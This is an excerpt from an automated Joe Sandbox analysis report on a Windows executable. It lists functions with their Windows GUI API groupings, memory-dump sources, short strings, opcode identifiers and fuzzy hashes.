                                                                            • API String ID: 1877249070-2766056989
                                                                            • Opcode ID: 8ee0b49f7d9925462ddefdc57ec641247ea191f704512888dfabb0780fe64466
                                                                            • Instruction ID: 140cad35568e94f452ad0275af3b7fffb49309a9d8d4eaa39f9df7672e3ed6a8
                                                                            • Opcode Fuzzy Hash: 8ee0b49f7d9925462ddefdc57ec641247ea191f704512888dfabb0780fe64466
                                                                            • Instruction Fuzzy Hash: 78E1AB36604A8082EB26DFA6E4447EA63B1FB8ABD4F044225EF5A177F1DF38C655C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014006288C Relevance: 28.9, APIs: 19, Instructions: 442windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$Beep
                                                                            • String ID:
                                                                            • API String ID: 877464050-0
                                                                            • Opcode ID: 6641b13dfa4fa58008cad89c09aeb1b98cc96b389eb434e9f60f319105532cac
                                                                            • Instruction ID: 28ceacd0c0eed99e254be9da9112040e60a409c879e384fdc2aa0697006f248c
                                                                            • Opcode Fuzzy Hash: 6641b13dfa4fa58008cad89c09aeb1b98cc96b389eb434e9f60f319105532cac
                                                                            • Instruction Fuzzy Hash: 7102CC32700A5586EB26DF66D844BEE2362F788BC8F600522EF0E57BA5DF79C945C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400F6550 Relevance: 28.8, APIs: 19, Instructions: 287windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Capture$Message$Window$RectRelease$Dispatch$CursorInflateInvalidatePeekSendShowUpdate
                                                                            • String ID:
                                                                            • API String ID: 3442015766-0
                                                                            • Opcode ID: d20c489f634d74416a7611dc0b6d08c35d34bd75ea5450a69a6b5875957c9e90
                                                                            • Instruction ID: 86ef2b047a16d48c46ba655c4d43d2274012e181eba7e8355bcf87f9e1ea2742
                                                                            • Opcode Fuzzy Hash: d20c489f634d74416a7611dc0b6d08c35d34bd75ea5450a69a6b5875957c9e90
                                                                            • Instruction Fuzzy Hash: 1EC1933670464096FF17DB37D4647EA67A1AB8CBC8F084529AF0A4BBB5EEB8C445D340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400B65E4 Relevance: 28.6, APIs: 15, Strings: 1, Instructions: 606windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$CreateEllipse$CompatibleHashRect$BitmapBrushDeleteImplImpl::InflateOffsetRectangleSolidStock
                                                                            • String ID:
                                                                            • API String ID: 3053867852-3916222277
                                                                            • Opcode ID: 41a9a0f86e7679696dd18d34951ead7d5c7f10c4feddc00e758b6f12322b91c4
                                                                            • Instruction ID: 6d72cbe629fbee27e46a4bb661315642e0698a66fcbb781c79e130a2c308d2cf
                                                                            • Opcode Fuzzy Hash: 41a9a0f86e7679696dd18d34951ead7d5c7f10c4feddc00e758b6f12322b91c4
                                                                            • Instruction Fuzzy Hash: 4642C836A10A908AE712DF7AD4057AD77B4FB597D8F008316EF4AA7B65DB38D842C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140084568 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 247windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Hash$Create$CompatibleImplImpl::$Bitmap$DeleteStretchTransparent
                                                                            • String ID: $
                                                                            • API String ID: 3547714547-227171996
                                                                            • Opcode ID: 282ab98834eb7c554d698cc89adb70fda8970aff68e4d2f5b003cd5c379e578f
                                                                            • Instruction ID: 5e20ca15cc98591caced316c9573e667a99a365e7595180964947c63d88c44cf
                                                                            • Opcode Fuzzy Hash: 282ab98834eb7c554d698cc89adb70fda8970aff68e4d2f5b003cd5c379e578f
                                                                            • Instruction Fuzzy Hash: 79B14B76714A808AE721DF66E4807DE77B1F398798F100225AF8E57BB8DB38C545CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400621E4 Relevance: 27.5, APIs: 18, Instructions: 462windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$Beep
                                                                            • String ID:
                                                                            • API String ID: 877464050-0
                                                                            • Opcode ID: 161481fb31babc6bd9914bcfb27d5817e7c0f4a7692d254da4a467f4a5f87bde
                                                                            • Instruction ID: 3481fd8127dfe0a695de812ff794c2137596a33527cb117cddbedf97fa8afc5c
                                                                            • Opcode Fuzzy Hash: 161481fb31babc6bd9914bcfb27d5817e7c0f4a7692d254da4a467f4a5f87bde
                                                                            • Instruction Fuzzy Hash: D112DF72700A5086EB26DB66D854BEE23A2F74CBC8F200912EF1E57BA5DF38D945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016A774 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 289windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$SystemWindow$InfoMetricsMonitor$ClientCopyCursorFromMessageParametersPointSendTheme
                                                                            • String ID: 3
                                                                            • API String ID: 381205858-1842515611
                                                                            • Opcode ID: 847bb6644997e3cba79a60948d2b593250b0f05c51d357fee4ffe0bade6e9487
                                                                            • Instruction ID: 9dfa2018b1c504905c31ae1a8447e0a3b1e8459d304cb42b45104b3ba001b9ed
                                                                            • Opcode Fuzzy Hash: 847bb6644997e3cba79a60948d2b593250b0f05c51d357fee4ffe0bade6e9487
                                                                            • Instruction Fuzzy Hash: C2D19772600B908BEB11CB6AE8887DD33A5F78CB98F554226DF4D57BA4DB78C841CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400E67A4 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 724windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$OffsetWindow$ClientCreateEmptyIndirectVisible
                                                                            • String ID: 2
                                                                            • API String ID: 398194487-450215437
                                                                            • Opcode ID: c6154c0d9d427c9ae4c3ece4907c0215b3eedc5a210a88e820b8fffa993d6729
                                                                            • Instruction ID: fdfc20634623b5ca35e2747f9b68cf4a6b2e32347a290bf542755ca34dfde4a5
                                                                            • Opcode Fuzzy Hash: c6154c0d9d427c9ae4c3ece4907c0215b3eedc5a210a88e820b8fffa993d6729
                                                                            • Instruction Fuzzy Hash: 77628D32600B8185EB22DF7AD8407ED6361F789BE8F445216EF5967BA9EF34C944C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C21A1 Relevance: 19.8, APIs: 13, Instructions: 276windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Capture$Window$Dispatch$PeekRectRedrawReleaseScroll
                                                                            • String ID:
                                                                            • API String ID: 1873598099-0
                                                                            • Opcode ID: 8aa9477636bff577f2c98f28b5843f1c3e2af85a127e6c478c5069c94bd966b3
                                                                            • Instruction ID: 1ebc416a63cfc6b69e71ffc10b2aa332aac407b7350a40ad987e63837d02d555
                                                                            • Opcode Fuzzy Hash: 8aa9477636bff577f2c98f28b5843f1c3e2af85a127e6c478c5069c94bd966b3
                                                                            • Instruction Fuzzy Hash: 5DC15B363046408AEB2ADF67E4547EE67A1FB8DBC4F084126EB5A47BA9CF38D445C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140150750 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 264windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$MessageSend$CharExceptionInvalidateRectThrowUpdateUpperWindowwcschr
                                                                            • String ID: MenuBar
                                                                            • API String ID: 3755686937-731504628
                                                                            • Opcode ID: f3d56c2a86e3bee20ff0dc0bf83195bf3b45a895261da4294fdd102e1bbdffe1
                                                                            • Instruction ID: 69b37cbfccaf6cbb4eaa717013bba13037639fd086781866892e6dab312b1280
                                                                            • Opcode Fuzzy Hash: f3d56c2a86e3bee20ff0dc0bf83195bf3b45a895261da4294fdd102e1bbdffe1
                                                                            • Instruction Fuzzy Hash: E0B14A35300B4582EA2ADB67E4557EA63A0FB8DFC4F084125DF9A4BBA6DF79D441C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C271C Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 207timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow
                                                                            • String ID: _
                                                                            • API String ID: 1459077570-701932520
                                                                            • Opcode ID: 05cb1e4b945e8c441b8cf659f9aec8adb3d204be3092ac8448fe50b654a8c4f1
                                                                            • Instruction ID: b526aa750178a9b15378db31d6aa83abc6a7b1d0bc5516c7d8b49fa6b841f0e2
                                                                            • Opcode Fuzzy Hash: 05cb1e4b945e8c441b8cf659f9aec8adb3d204be3092ac8448fe50b654a8c4f1
                                                                            • Instruction Fuzzy Hash: 7F914C7660878097EA1DDF27E9547ED77A1F789BC0F084126EB4A83AA1CF39D461CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401A2710 Relevance: 18.2, APIs: 12, Instructions: 160windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$CaptureCursorSend$LoadPeekPostRelease$Wait
                                                                            • String ID:
                                                                            • API String ID: 2899155438-0
                                                                            • Opcode ID: 455c610cc485f8c5aa4e9b9fb6a84c9cddfc3fd87a10ae0bbfce77d00b1b3282
                                                                            • Instruction ID: f916bf15c452c35369b46352a224050d124869ad1a485103e75cc7d47ebb09c5
                                                                            • Opcode Fuzzy Hash: 455c610cc485f8c5aa4e9b9fb6a84c9cddfc3fd87a10ae0bbfce77d00b1b3282
                                                                            • Instruction Fuzzy Hash: 9D617F3630468082F766DB6BE544BEB67A1FB9CF84F044025DF9A47BA5DE79C481CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014008229C Relevance: 16.7, APIs: 11, Instructions: 246COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: wcsstr$FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 4197323741-0
                                                                            • Opcode ID: 8ffe74e06465c8f11655523048f02a8e1f9259899c663286b95a2dcdc82d2a73
                                                                            • Instruction ID: 6e57b712ccdf50806e327be3cbe3f68763cc71b9adcf24eb0828ab0ccb52159c
                                                                            • Opcode Fuzzy Hash: 8ffe74e06465c8f11655523048f02a8e1f9259899c663286b95a2dcdc82d2a73
                                                                            • Instruction Fuzzy Hash: 49B19D36304B8086EB26DB26E9507DE73A1F788BE4F841125EF9A47BA5DF78C645C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013C149 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Text$InflateWindow$DrawIconLengthMetricsOffset
                                                                            • String ID: $$UUUU
                                                                            • API String ID: 1344069868-1406628070
                                                                            • Opcode ID: c8423ba659b5cd69e830d85ccf0981591d17ff1d4224a7c24a290224df244533
                                                                            • Instruction ID: b6eba8df1219889ee2d3177986fef3a758d5c185399020238a15ed904ffa4219
                                                                            • Opcode Fuzzy Hash: c8423ba659b5cd69e830d85ccf0981591d17ff1d4224a7c24a290224df244533
                                                                            • Instruction Fuzzy Hash: 09129C36B20A908AEB16CF7AD8447ED73A1F78CB94F484225DF4957BA5DB78D910CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014005876C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalHandleLanguageLoadModuleReleaseUser
                                                                            • String ID: MS UI Gothic$comctl32.dll
                                                                            • API String ID: 1606157363-3248924666
                                                                            • Opcode ID: 2cfcb80d8f4fbae5debcd64d1f87cbb271c18279e5df8ce7563de3ba8ce1dc41
                                                                            • Instruction ID: c74af288cf3ee4a1370cbd887888ae7781fc1503b1c37d1759b453f0abdb9465
                                                                            • Opcode Fuzzy Hash: 2cfcb80d8f4fbae5debcd64d1f87cbb271c18279e5df8ce7563de3ba8ce1dc41
                                                                            • Instruction Fuzzy Hash: 1651A07570164542FA2BEB6794447F96391EB4DBC0F548C24AF499BBF1EE38C942C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401AC024 Relevance: 13.7, APIs: 9, Instructions: 206COMMON
